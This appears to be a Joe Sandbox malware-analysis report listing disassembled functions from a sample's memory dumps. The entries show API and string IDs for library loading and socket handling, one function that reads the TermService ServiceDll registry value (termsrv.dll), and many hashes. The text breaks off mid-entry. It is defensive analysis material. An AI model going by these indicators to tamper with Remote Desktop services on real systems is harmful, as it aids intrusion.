                    Function 00007FF8BFAB73F3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: 872c14c2b4ad4861cf5742ee842d8f6257a05eca4937ccb7efe48da9e016fe22
                    • Instruction ID: 0f7a98879ede79c8e0c24c464531575a80f3d835da37467aa46bfb753350e3d6
                    • Opcode Fuzzy Hash: 872c14c2b4ad4861cf5742ee842d8f6257a05eca4937ccb7efe48da9e016fe22
                    • Instruction Fuzzy Hash: D3F0D150B0CB175AFE1997CEAC031A553166F04BCDF086132CF5E0B7AAEE2DE54A8300
                    Function 00007FF8BA509F73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: c036b7072d391179714a13b79d8b8b11ab5854fb510460520e8d13921a022d51
                    • Instruction ID: 41b2fb5881e6be7f283b4540e76669fb653b289022ef4ae9f4654fcf2d121dd4
                    • Opcode Fuzzy Hash: c036b7072d391179714a13b79d8b8b11ab5854fb510460520e8d13921a022d51
                    • Instruction Fuzzy Hash: FDF06290A1D603D2FA125B9EAD401BA5355AF46BC0F448572DF4D47769EE2CD746C700
                    Function 00007FF708871613 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(?,?,00000000,000001B9FFF913D0,?,00007FF70887941F), ref: 00007FF708871633
                    • GetLastError.KERNEL32(?,?,00000000,000001B9FFF913D0,?,00007FF70887941F), ref: 00007FF708871666
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: a157c6f5a070bb91b7064ad8525a1e40f17c6e38c67420683487bfa65821a654
                    • Instruction ID: fd7d202ead52fb95295159ad42467e76e7129aa9683541854ec10576ceeb75f2
                    • Opcode Fuzzy Hash: a157c6f5a070bb91b7064ad8525a1e40f17c6e38c67420683487bfa65821a654
                    • Instruction Fuzzy Hash: CAF0D694A2860381FA52A745AC04DB9E2216F44BC0F884132CC4D077D5EF2CE6AA8328
                    Function 00007FF8B9181A23 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: 7b9909d9e40ec3fb382d97b107a8795d681622530cbf96aad0c3b5d9fcd7d944
                    • Instruction ID: 2d8d8db9d16b8e6589db55cf7037a1ec71be57f06d158bcd65a6be841bdbc603
                    • Opcode Fuzzy Hash: 7b9909d9e40ec3fb382d97b107a8795d681622530cbf96aad0c3b5d9fcd7d944
                    • Instruction Fuzzy Hash: E5F0D191A086C3A2FA028F8DE8402B563526F04BD4F15C031CE4D4B799FE2CEA47B310
                    Function 00007FF8BFB52174 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: b4151e89cc68ab8922232e954921d4160c28e21012f4ccf8fb881e6c53f3d0ac
                    • Instruction ID: e7ff4cf232b32bc323f9d46d2f015b9a5df29aa027b0a70aa4991b8754d4bf17
                    • Opcode Fuzzy Hash: b4151e89cc68ab8922232e954921d4160c28e21012f4ccf8fb881e6c53f3d0ac
                    • Instruction Fuzzy Hash: C4F05810E0B64765FE5197DEEC604B473506F28BC0B480471DF0C66B62EE3CF5868300
                    Function 00007FF8BFB844A4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: d8dd7991dd3798304102d1c6ec9b6a5b169de9ed62c1dd31b0746ba544ad9bed
                    • Instruction ID: 129b38dfb0f56d9b3f657af8351ca6798785d394a605b4adb99039c610923640
                    • Opcode Fuzzy Hash: d8dd7991dd3798304102d1c6ec9b6a5b169de9ed62c1dd31b0746ba544ad9bed
                    • Instruction Fuzzy Hash: 31F05E10A4A64B81FD55ABDEA8449F02390AF48BC4F48A431CE0D5775AFD2CA646C300
                    Function 00007FF8BFB81942 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteshutdown
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                    • API String ID: 2143829457-932964775
                    • Opcode ID: d6588b44ca74bd409c2f78fa1d34f814bde72a429c89db37472fc14125d1e203
                    • Instruction ID: 0372d173eb8bf139b0ac4ef13d43122c1b9e6ab6fd080b6f57a60e297fe26457
                    • Opcode Fuzzy Hash: d6588b44ca74bd409c2f78fa1d34f814bde72a429c89db37472fc14125d1e203
                    • Instruction Fuzzy Hash: D3F0E221E0D543C1EA146FADE8440F92350AF85BD8F94C632DB0C821F2FE2CA54BC300
                    Function 00007FF8B915CF94 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: 9d72b4fa98c9842228753628f205ac3672df276f9da1b1e84b80ddd4ff2c3b68
                    • Instruction ID: d989370117e27ff442e7930c8d3286487e26d7d20239ba50bff6a1dc5269743b
                    • Opcode Fuzzy Hash: 9d72b4fa98c9842228753628f205ac3672df276f9da1b1e84b80ddd4ff2c3b68
                    • Instruction Fuzzy Hash: 63F0BE64E0AAD741FA43AF5EE8104B422806F08BC4F499432DE0C96B56EE1CB585E300
                    Function 00007FF8BFAB7474 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: bb1c619928ca4f7d8e2c426f45a5e1ff751cec92606ee6664daf73d51ae6e90a
                    • Instruction ID: 5e68b352eae296a1d0e7405c0cef4d81bcd2cd250befd975a666e64423d59853
                    • Opcode Fuzzy Hash: bb1c619928ca4f7d8e2c426f45a5e1ff751cec92606ee6664daf73d51ae6e90a
                    • Instruction Fuzzy Hash: F6F05E10A0EB4B48FD19A7DEAC434B027506F04BDDB483431CF0D16766FD6DA98A8300
                    Function 00007FF8BFAB1462 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteshutdown
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                    • API String ID: 2143829457-932964775
                    • Opcode ID: 6125c0084bdc85d73f7bde19a877d0e344868a41d6e5677988897e0956617668
                    • Instruction ID: 2c386c91c3c03861e8bf1380a58259556004214e81c98ad916486d67ca05c71a
                    • Opcode Fuzzy Hash: 6125c0084bdc85d73f7bde19a877d0e344868a41d6e5677988897e0956617668
                    • Instruction Fuzzy Hash: CAF054A1E0C90399E61957ADEC470B55751AF10BDCF94A532DB1CA61F6FE1CA94E8300
                    Function 00007FF8BA509FF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: fd51d1cbaee2ddb6301145fafeb239ad102a1964c430bb25295e8db6dcc54a2a
                    • Instruction ID: eef99c998f22e0f981c0513f8896fee90ce4fddaa909c1dda28792a24753a156
                    • Opcode Fuzzy Hash: fd51d1cbaee2ddb6301145fafeb239ad102a1964c430bb25295e8db6dcc54a2a
                    • Instruction Fuzzy Hash: 96F05454E4D607E4ED21A7EEAC904B12250AF077C0F8455B2CF0D56365FE1CAB46C310
                    Function 00007FF8B9181AA4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                    • API String ID: 4085810780-3386190286
                    • Opcode ID: eb8e6a62fdbad73e6668c39471aa49a82b9171855985ab7e5bfeb5c52a358f98
                    • Instruction ID: fd222b74897f9dbe6fd12d064a1908f727ff3ae57ed5dd56cba605782f16bda5
                    • Opcode Fuzzy Hash: eb8e6a62fdbad73e6668c39471aa49a82b9171855985ab7e5bfeb5c52a358f98
                    • Instruction Fuzzy Hash: 06F08251E096C751FD569F9EE8805F022519F05BD4F498531CF0C57756FD1CA987B310
                    Function 00007FF8BFB819A5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastclosesocketfflushfwrite
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                    • API String ID: 152032778-2221966578
                    • Opcode ID: 8599731fb1bba70c80c6a87e0d95c1ba84472dea675db9bdef4eccd0eba7448a
                    • Instruction ID: 63d541d7c2bb6d7719950bd33f6727107b1dd9e040c96960f3e5754402777080
                    • Opcode Fuzzy Hash: 8599731fb1bba70c80c6a87e0d95c1ba84472dea675db9bdef4eccd0eba7448a
                    • Instruction Fuzzy Hash: C4F05890E0D647C1FA18ABFDE8410B82351AF94BF8F148335D73E562E3AE2CA586C300
                    Function 00007FF8BFAB14C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastclosesocketfflushfwrite
                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                    • API String ID: 152032778-2221966578
                    • Opcode ID: 12861671799783d57c0e45ebdd2486de4913a4295b0a9ddc1e35ca3c9b0b37bb
                    • Instruction ID: b7848574a132c4adbfd870015e5be3630530f9be8714a23d6641a4abfaaf0a56
                    • Opcode Fuzzy Hash: 12861671799783d57c0e45ebdd2486de4913a4295b0a9ddc1e35ca3c9b0b37bb
                    • Instruction Fuzzy Hash: E6F09090E0890384FA1857EEAC171B417109F10BFCF547331DB3EA51E6AD1CA9498300
                    Function 00007FF8B9185AC0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 50stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Openstrcmpstrlen
                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                    • API String ID: 679246061-1413152910
                    • Opcode ID: 63975a93190b79f59677f2cf894f3a731aba901ec3ab26a81d23eb9d20377d47
                    • Instruction ID: 9441c1d6a57794b99c6655ae9db667440c4c3639640f577e8d18a6079f9be22e
                    • Opcode Fuzzy Hash: 63975a93190b79f59677f2cf894f3a731aba901ec3ab26a81d23eb9d20377d47
                    • Instruction Fuzzy Hash: CC219D71A1CAC751EB208F18A8C03FA6355EF60394F850072E79D46196EF3CD649F650
                    Function 00007FF8BFB52349 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastfflushfwriteioctlsocket
                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                    • API String ID: 325303940-110789774
                    • Opcode ID: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
                    • Instruction ID: 5c49cc86d297a1da9224adbb52b373ee3a9d1ae7eee50ab03f3966d6b1a772b9
                    • Opcode Fuzzy Hash: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
                    • Instruction Fuzzy Hash: 84F09661F0D64396F75057ADA8101B97360AB947D4F144131EF2D87BA4EE7CE9468700
                    Function 00007FF8BFB818D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
